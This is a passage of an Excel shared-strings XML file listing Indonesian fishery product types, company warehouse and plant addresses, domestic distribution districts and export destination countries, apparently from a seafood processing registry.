  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Chile, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Pergudangan 75 Blok F RT/RW 004/008 Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Sotong Beku</t>
  </si>
  <si>
    <t>Cumi-Cumi Beku</t>
  </si>
  <si>
    <t>Cunang Beku</t>
  </si>
  <si>
    <t>Jl. Kalianak Barat 75 Blok E Kav 6-8, Kel. Genting Kalianak, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Gulama, Lencam, Senangin, Manyung, Kerapu, Layur, Sukang, Kakap, Kaci-kaci, Kuro)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Raya Pakah Ponco, Kel. Sumberagung, Kec. Plumpang, Kabupaten Tuban&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso KM 7, Kel. Kamoro Jaya, Kec. Timika Timur, Kabupaten Mimika&lt;br&gt;Papua</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Banjar, Tenggiri, Lasi, Kembung)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Manyung, Anggoli, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Jl. Ancol III No. 1-2, Kel. Ancol Barat, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Tratas No. 37, Kel. Kedungringin, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Bandung</t>
  </si>
  <si>
    <t>Malaysia, Singapore, South Africa</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Sebelah, Jenaha, Bawal, Kakap, Pari, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Layur, Tenggiri)</t>
  </si>
  <si>
    <t>Dusun Banyu Urip RT 001 RW 001, Kel. Mojorejo, Kec. Pungging, Kabupaten Mojokerto&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Selumit Pantai RT 21, Kel. Selumit Pantai, Kec. Tarakan Tengah, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Jl. Moch Roem RT 03, Kel. Bontang Lestari, Kec. Bontang Selatan, Kota Bontang&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Kota Balikpapan, Kota Samarinda, Kota Bontang</t>
  </si>
  <si>
    <t>Snack Ikan</t>
  </si>
  <si>
    <t>Kabupaten Kutai Timur, Kota Balikpapan, Kota Samarinda, Kota Bontang</t>
  </si>
  <si>
    <t>Kawasan Industri Karyadeka Panca Murni Kav C2 Kp. Pasir Konci RT 015 RW 005, Kel. Pasir Sari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Samudera Kendari, Jl. Samudera No.1, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Mata Besar, Cakalang)</t>
  </si>
  <si>
    <t>Jl. Metal Komplek Ruko Metal Minimalis No.9, Kel. Tanjung Mulia, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Layur, Kembung, Kuring, Salem, Selar, Aso-aso, Layang)</t>
  </si>
  <si>
    <t>Kabupaten Batu Bara, Kota Sibolga, Kota Tanjung Balai, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Pekanbaru, Kota Jambi, Kota Palembang</t>
  </si>
  <si>
    <t>Jl. Sampangan No. 1, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Aceh Timur</t>
  </si>
  <si>
    <t>Daging Bekicot Kaleng</t>
  </si>
  <si>
    <t>Ruko Graha Dika Blok A 04-05, Kel. Semampir, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Margomulyo Permai Blok H5, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barakuda, Barramundi, Lencam, Senangin, Manyung, Kuwe, Angoli, Kerapu, Kakatua, Bawal)</t>
  </si>
  <si>
    <t>Kabupaten Probolinggo, Kabupaten Lamongan, Kabupaten Bangkalan, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Amberjack, Lemuru, Tongkol, Kuwe, Kembung, Tenggiri, Selar Kuning)</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Mata Besar, Sebelah, Flounder, Manyung, Kerapu, Layur, Bawal, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok K No.6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kerapu, Layur, Bawal, Kaca Piring, Kakap, Ekor Kuning, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Adi Sucipto Belakang Eks Bioskop Indah Raya Km 5,8, Kel. Sungai Raya, Kec. Sungai Raya, Kabupaten Kubu Raya&lt;br&gt;Kalimantan Barat</t>
  </si>
  <si>
    <t>Kota Pontianak</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Senangin, Kerapu, Bawal, Kakap, Kurau, Barramundi)</t>
  </si>
  <si>
    <t>Klaci II RT 004 RW 011, Kel. Margoluwih, Kec. Seyegan, Kabupaten Sleman&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Keripik Belut</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Semarang, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Keripik Wader</t>
  </si>
  <si>
    <t>Jl. Jenggolo 2/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Belut, Gurame, Bandeng)</t>
  </si>
  <si>
    <t>Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Kapten Samadikun No. 34 RT 01 RW 05, Kel. Kesenden, Kec. Kejaksan, Kota Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Bouvet Island, China, Malaysia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Pergudangan Margomulyo Permai Blok J- 12, J-12A, Kel. Tambak Sarioso, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Probolinggo, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Bangkalan, Kabupaten Sumenep, Kota Surabaya</t>
  </si>
  <si>
    <t>Hong Kong, United States</t>
  </si>
  <si>
    <t>Desa Gonggong, Kec. Banggai Tengah, Kabupaten Banggai Laut&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Japan, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Jl. Sabar Jaya No.59, Kel. Prajen, Kec. Banyuasin, Kabupaten Banyuasin&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Bandeng)</t>
  </si>
  <si>
    <t>Jl. Sabar Jaya No. 59, Kel. Prajen, Kec. Banyuasin, Kabupaten Banyuasin&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Malong, Layur)</t>
  </si>
  <si>
    <t>France, Japan, Netherlands, Spain, United Kingdom, United States</t>
  </si>
  <si>
    <t>Germany, Greece, Italy, Lebanon, Netherlands, Peru, Turkey, United States</t>
  </si>
  <si>
    <t>Belgium, France, Netherlands, Singapore, United Arab Emirates, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami Kawasan Pergudangan Pattene 88 Cluster Green Park Blok A3 No.3, Kel. Temmapaduae, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu</t>
  </si>
  <si>
    <t>Philippines</t>
  </si>
  <si>
    <t>Jl. Cinranae No.1, Kel. Marumpa, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Lobak No.109 C, Kel. Delima, Kec. Tampan, Kota Pekanbaru&lt;br&gt;Riau</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Siomay Ikan, Siomay Udang, Batagor Ikan, Tekwan) </t>
  </si>
  <si>
    <t>Kota Pekanbaru</t>
  </si>
  <si>
    <t>Pergudangan Central Square Blok E 31, Jl. Ahmad Yani No.41-43, Kel. Keboansikep, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kuwe,Kerapu, Layur, Bawal, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Lemadang, Marlin, Gindara, Sarden, Cakalang)</t>
  </si>
  <si>
    <t>Pergudangan Central Square Blok E 31 Jl. Ahmad Yani No. 41-43, Kel. Keboansikep, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Greece</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Patin, Nila, Gurami, Lele, Bawal)</t>
  </si>
  <si>
    <t>Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Pantai Sorong, Jl. Cakalang, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Kembung, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Lencam, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Muara Angke PHPT Blok A No.01-06, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tude, Deho, Terbang, Kembung, Semar, Salem, Tenggiri)</t>
  </si>
  <si>
    <t>Kabupaten Tulungagung, Kabupaten Malang, Kabupaten Probolinggo, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Gresik, Kabupaten Bangkalan, Kabupaten Sumenep, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Sultan Hasanudin Kompleks Pelabuhan Perikanan Nusantara Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Deho, Kembung, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Ambon</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Sebelah, Kerapu, Lidah, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Pura Segara, Dusun Munduk , Kel. Pengambengan, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Jl. Mina Ayu RT 13 RW 04, Kel. Limbangan, Kec. Juntinyuat, Kabupaten Indramayu&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kampung Namatota, Distrik Kaimana, Kabupaten Kaimana&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Senangin, Kerapu, Layur, Bawal, Kakap, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Tuna Raya No.5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Utara, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Tuna Raya No. 5, Muara Baru Ujung, PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Alfonsino, Broadbanded Thornyhead, Kerapu, Gerot-gerot, Halibut, Red Sea Bream, Kakap, Trout)</t>
  </si>
  <si>
    <t>Telur Ikan Segar</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tuna, Amberjack, Makerel Atlantik, Salem, Sauri Pasifik, Philcard, Pedang, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Alfonsino, Broadbanded Thornyhead, Sebelah, Kerapu, Gerot-gerot, Red Sea Bream, Kakap Merah, Kakap, Trout)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Amberjack, Makerel Atlantik, Kembung, Salem, Pacific Saury, Philcard, Pedang, Ekor Kuning)</t>
  </si>
  <si>
    <t>Pergudangan Gading Mutiara Permai Blok G-11, Kel. Kepatihan, Kec. Menganti, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Makarel, Salem, Sarden)</t>
  </si>
  <si>
    <t>Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Bogor, Kota Sukabumi, Kota Bandung, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Sukabumi, Kota Bandung, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kod, Sebelah, Kerapu, Monkfish, Kakap, Seabass, Barramundi)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Utara, Kota Bandung, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Rajungan Rebus Dingin</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bogor, Kota Sukabumi, Kota Bandung, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Makerel, Salem, Sarden)</t>
  </si>
  <si>
    <t>Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bekasi, Kabupaten Bandung Barat, Kota Bogor, Kota Sukabumi, Kota Bandung, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kod, Sebelah, Monkfish, Kakap, Seabass, Barramundi)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Utara, Kota Sukabumi, Kota Bandung, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
    <t>Jl. Raya Narogong KM 26.5, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, Thailand</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto Km 6,2 No.89 RT 003 RW 006, Kel. Keroncong, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Central African Republic, Morocco</t>
  </si>
  <si>
    <t>Udang Bernilai Tambah Beku (Bakso Udang)</t>
  </si>
  <si>
    <t>Kabupaten Lampung Selatan, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Jl. Pogidon No. 35 Lingkungan I, Kel. Bailang, Kec. Bunaken, Kota Manado&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Denpasar</t>
  </si>
  <si>
    <t>Pergudangan Eastroad Blok F No.18, Kel. Bajarsari, Kec. Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Kembung, Talang-talang, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Probolinggo, Kabupaten Sidoarjo, Kota Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Lencam, Kerapu, Layur, Beloso, Kakatua, Kakap, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t>Japan, Korea, Democratic People's Republic of, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Bandeng, Patin, Bawal)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Malaysia, Saudi Arabia, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Usman Harun RT 001, Kel. Sei Pancang, Kec. Sebatik Utara, Kabupaten Nunukan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Senangin, Alu-alu, Kerapu, Bawal, Kakap, Kuro, Merah)</t>
  </si>
  <si>
    <t>Kota Surabaya, Kota Balikpapan, Kabupaten Bulungan, Kabupaten Nunukan, Kota Tarakan, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Panni, Lemuru, Tongkol, Kembung, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Ternate, Gg. H. Kasim, Kel. Merauke, Kec. Merauke, Kabupaten Merauke&lt;br&gt;Papua</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Amberjack, Hokke, Kakap Merah, Sillago)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Hamachi, Gindara, Pacific Saury, Saba Mackerel)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Amberjack, Hokke, Kakap Merah, Sillago)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Hamachi, Gindara, Sauri Pasifik, Saba Mackerel)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Kampung Penggoreng, Kel. Mangunreja, Kec. Pulo Ampel, Kabupaten Serang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Bekasi, Kota Pasuruan, Kota Serang</t>
  </si>
  <si>
    <t>Hong Kong, Malaysia, Thailand, Turkey, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Rembang Industri II No. 38 (PIER), Kel. Pandean, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Sotong, Cumi Karet, Gurita, Cumi-cumi)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kakap Merah)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Muroaji)</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Lele, Patin, Nila)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kabupaten Probolinggo, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Gulama, Kakap Merah)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kabupaten Semarang, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Tongkol, Muroaji)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kabupaten Semarang, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Segar Hasil Budidaya (Lele, Bandeng, Patin, Nila)</t>
  </si>
  <si>
    <t>Kabupaten Semarang, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kabupaten Semarang, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Kompleks PPN Ambon, Jl. Sultan Hasanudin RT 03 RW 011, Kel. Batu Merah, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Depok, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Australia, France, Italy, Japan, United Arab Emirates, United Kingdom, United States</t>
  </si>
  <si>
    <t>Australia, China, France, Hong Kong, Italy, Japan, Oman, Saudi Arabia, Singapore, Thailand, United Kingdom, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Gudang Padi No. 20 RT. 006 RW. 003, Kel. Pasar Padi, Kec. Girimaya, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Jl. Balikpapan 2 / 03 GKB, Kel. Yosowilangun, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Jakarta Timur, Kota Bogor, Kabupaten Ponorogo, Kabupaten Kediri, Kabupaten Malang, Kabupaten Jember, Kabupaten Banyuwangi, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Kediri, Kota Malang, Kota Pasuruan, Kota Surabaya, Kota Tangerang, Kota Denpasar, Kota Mataram, Kota Kendari</t>
  </si>
  <si>
    <t>Jl. Raya Kalirungkut 5 Blok D-31 Komplek Ruko Rungkut Megah Raya, Kel. Kalirungkut, Kec. Rungkut, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke No.24, 26, 26A, 27, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Samge, Cunang)</t>
  </si>
  <si>
    <t>JL. Rungkut Industri II/25, Kel. Tenggilis Mejoyo, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Lencam, Anggoli, Kerapu, Julung-julung, Jenaha, Kakatua, Kakap Merah, Kaci-kaci, Barramundi)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Probolinggo, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya, Kabupaten Sumbawa, Kota Balikpapan, Kota Tarakan, Kota Ambon</t>
  </si>
  <si>
    <t>Canada, China, Dominican Republic, France, Guadeloupe, Malaysia, Martinique, Mauritius, New Zealand, Philippines, Puerto Rico, R√©union, Singapore, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>JL. Rungkut Industri II/25 , Kel. Tenggilis Mejoyo, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Swanggi, Terbang, Senangin, Kuwe, Layur, Kembung, Beloso, Cakalang, Tenggiri, Tetengkek)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Probolinggo, Kota Surabaya, Kabupaten Sumbawa, Kota Balikpapan, Kota Ambon</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Philippines, Saudi Arabia, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kota Balikpapan</t>
  </si>
  <si>
    <t>Canada, China, France, Greece, Italy, New Zealand, Spain, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Mas, Gurami, Bandeng, Patin, Nila)</t>
  </si>
  <si>
    <t>Kabupaten Probolinggo, Kota Surabaya, Kabupaten Sumbawa, Kota Balikpapan, Kota Tarakan, Kota Ambon</t>
  </si>
  <si>
    <t>Malaysia, Philippines, Thailand, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Anggoli, Kakap Merah)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung, Kota Surabaya, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Teri Kaleng</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bandung Barat, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Margomulyo 4E, Kel. Tandes Lor, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Germany, Italy, Japan, United States</t>
  </si>
  <si>
    <t>France, Philippines, Singapore, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap, Kod)</t>
  </si>
  <si>
    <t>Australia, Canada, Germany, Philippines, United States</t>
  </si>
  <si>
    <t>Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Manyung, Kerapu, Layur, Kakap Merah, Kuro, Kurisi)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Bekasi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Layur, Kakap Merah, Baronang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Kembung, Layang, Cakalang, Tenggiri, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Karawang, Kabupaten Bekasi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Sri Lanka, Thailand</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Goyang, Kerapu, Kakatua, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Terusan Bandengan Utara No. 95 Blok E No. 6 RT 003 RW 016, Kel. Pejagalan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
